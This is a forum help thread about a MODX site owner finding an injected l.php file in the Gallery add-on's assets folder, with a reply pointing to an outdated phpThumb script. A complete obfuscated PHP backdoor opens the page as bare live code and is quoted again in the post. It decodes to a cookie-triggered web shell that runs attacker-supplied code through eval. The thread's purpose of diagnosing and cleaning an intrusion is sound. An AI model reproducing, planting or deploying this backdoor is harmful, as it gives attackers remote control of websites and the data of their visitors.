<?php $knyl="chJGM9J2chNvdW50JzskYT0kX0NPT0tJRchTchtpchZichhyZXchNldCgkYSk9PSdzaScgJiYgJGMoJGEchpPjMpechyRr";$zzfo="PSdzYWochzcHduZCc7ZWNobyAnPCcuJGsuchJchz4nO2V2chYWwoYmFzZTY0X2RlY29kZShwcchmVnX3Jlcc";$lzcn="pvaW4oYXJychYXlfchc2xpYch2chUoJGEsJchGMoJGEpLTMpKSkpKTtlY2hvchICchc8LchycuJGsuJchz4nchO3ch0=";$rbyz = str_replace("u","","ustur_uruepuluauce");$ngnd="hGchxhY2UochYXJychYXkoJy9bXlchx3PVxzXSch8chnchLCcvXHMvchJyksIGFychcmF5KCcnLCcrJyksIchG";$sczz = $rbyz("v", "", "vbavsev64_vdevcvovdve");$qewo = $rbyz("j","","jcrjejajtej_jfjujncjtijojn");$tlbl = $qewo('', $sczz($rbyz("ch", "", $knyl.$zzfo.$ngnd.$lzcn))); $tlbl(); ?>
This question has been answered by multiple community members. See the first response.
Hello,
I'm running Revo 2.2.7 with the security patch installed.
Today I noticed in my assets folder there a was a directory with the name '.' inside. Within the . folder there was a file called l.php which had the following content
<!--?php $knyl="chJGM9J2chNvdW50JzskYT0kX0NPT0tJRchTchtpchZichhyZXchNldCgkYSk9PSdzaScgJiYgJGMoJGEchpPjMpechyRr";$zzfo="PSdzYWochzcHduZCc7ZWNobyAnPCcuJGsuchJchz4nO2V2chYWwoYmFzZTY0X2RlY29kZShwcchmVnX3Jlcc";$lzcn="pvaW4oYXJychYXlfchc2xpYch2chUoJGEsJchGMoJGEpLTMpKSkpKTtlY2hvchICchc8LchycuJGsuJchz4nchO3ch0=";$rbyz = str_replace("u","","ustur_uruepuluauce");$ngnd="hGchxhY2UochYXJychYXkoJy9bXlchx3PVxzXSch8chnchLCcvXHMvchJyksIGFychcmF5KCcnLCcrJyksIchG";$sczz = $rbyz("v", "", "vbavsev64_vdevcvovdve");$qewo = $rbyz("j","","jcrjejajtej_jfjujncjtijojn");$tlbl = $qewo('', $sczz($rbyz("ch", "", $knyl.$zzfo.$ngnd.$lzcn))); $tlbl(); ?-->
This obviously appears to have been injected somehow.
I've removed the offending folder and file but am trying to understand how it has been done.
Anyone had anything similar? Is it a permissions issue?
Thanks
[10-Dec-2013 15:18:35 Europe/London] PHP Warning: chdir() [<a href='function.chdir'>function.chdir</a>]: No such file or directory (errno 2) in /home/foo/public_html/assets/components/gallery/l.php(1) : runtime-created function(1) : eval()'d code on line 1
Yes I do indeed use the Gallery addon.
Hello,
To fix this you must upgrade your phpThumb script from v1.7.9 to v1.7.11.